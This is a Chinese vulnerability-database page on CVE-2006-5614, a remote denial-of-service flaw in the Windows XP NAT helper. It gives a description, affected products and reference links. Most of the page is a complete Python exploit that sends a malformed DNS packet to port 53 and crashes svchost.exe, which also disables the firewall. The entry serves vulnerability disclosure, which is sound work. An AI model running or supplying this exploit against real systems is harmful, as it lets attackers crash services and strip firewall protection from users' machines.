Microsoft Windows NAT帮助程序远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111401 漏洞类型 其他
发布时间 2006-10-28 更新时间 2007-11-20
CVE编号 CVE-2006-5614 CNNVD-ID CNNVD-200610-527
漏洞平台 Windows CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/2672
https://www.securityfocus.com/bid/20804
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-527
|漏洞详情
MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。MicrosoftWindowsNAT帮助程序模块在处理畸形DNS报文时存在漏洞,远程攻击者可能利用此漏洞执行拒绝服务攻击。如果WindowsXP用户启用了Internet连接共享的话,则远程攻击者可以通过发送AdditionalRRs(也被称为AdditionalInformation)部分包含有两个空字节的DNS报文导致服务和主机进程(svchost.exe)崩溃。由于ICS服务关系到防火墙服务,因此ICS崩溃就会导致防火墙服务失效。
|漏洞EXP
#!/usr/bin/python
# Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
# Bug discovered by h07 <h07@interia.pl>
# Tested on XP SP2 Polish
# Details:
#
# Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
#
# [Process svchost.exe, module ipnathlp]
# --> MOV DL, [EAX]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
##

from socket import *
from time import sleep

host = "192.168.0.1"
port = 53

buffer = ( # DNS (query)
"\x6c\xb6" # Transaction ID: 0x6cb6
"\x01\x00" # Flags: 0x0100 (Standard query)
"\x00\x00" # Questions: 0
"\x00\x00" # Answer RRs: 0
"\x00\x00" # Authority RRs: 0
"\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0)
"\x03\x77\x77\x77" #
"\x06\x67\x6f\x6f" #
"\x67\x6c\x65\x03" #
"\x63\x6f\x6d\x00" # Name: www.google.com
"\x00\x01" # Type: A (Host address)
"\x00\x01" # Class: IN (0x0001)
)

s = socket(AF_INET, SOCK_DGRAM)
s.connect((host, port))
s.send(buffer)
sleep(1)
s.close()

# EoF

# milw0rm.com [2006-10-28]
|受影响的产品
Microsoft Windows XP Tablet PC Edition SP2 Microsoft Windows XP Tablet PC Edition SP1 Microsoft Windows XP Tablet PC Edition Microsoft Windows XP Professional SP2 Microsoft Windows XP Pr
|参考资料

来源:SECUNIA
名称:22592
链接:http://secunia.com/advisories/22592
来源:MILW0RM
名称:2672
链接:http://milw0rm.com/exploits/2672
来源:XF
名称:win-ipnathlp-dos(29917)
链接:http://xforce.iss.net/xforce/xfdb/29917
来源:BID
名称:20804
链接:http://www.securityfocus.com/bid/20804
来源:OSVDB
名称:30096
链接:http://www.osvdb.org/30096
来源:VUPEN
名称:ADV-2006-4248
链接:http://www.frsirt.com/english/advisories/2006/4248
来源:SECTRACK
名称:1017133
链接:http://securitytracker.com/id?1017133
来源:MISC
链接:http://research.eeye.com/html/alerts/zeroday/20061028.html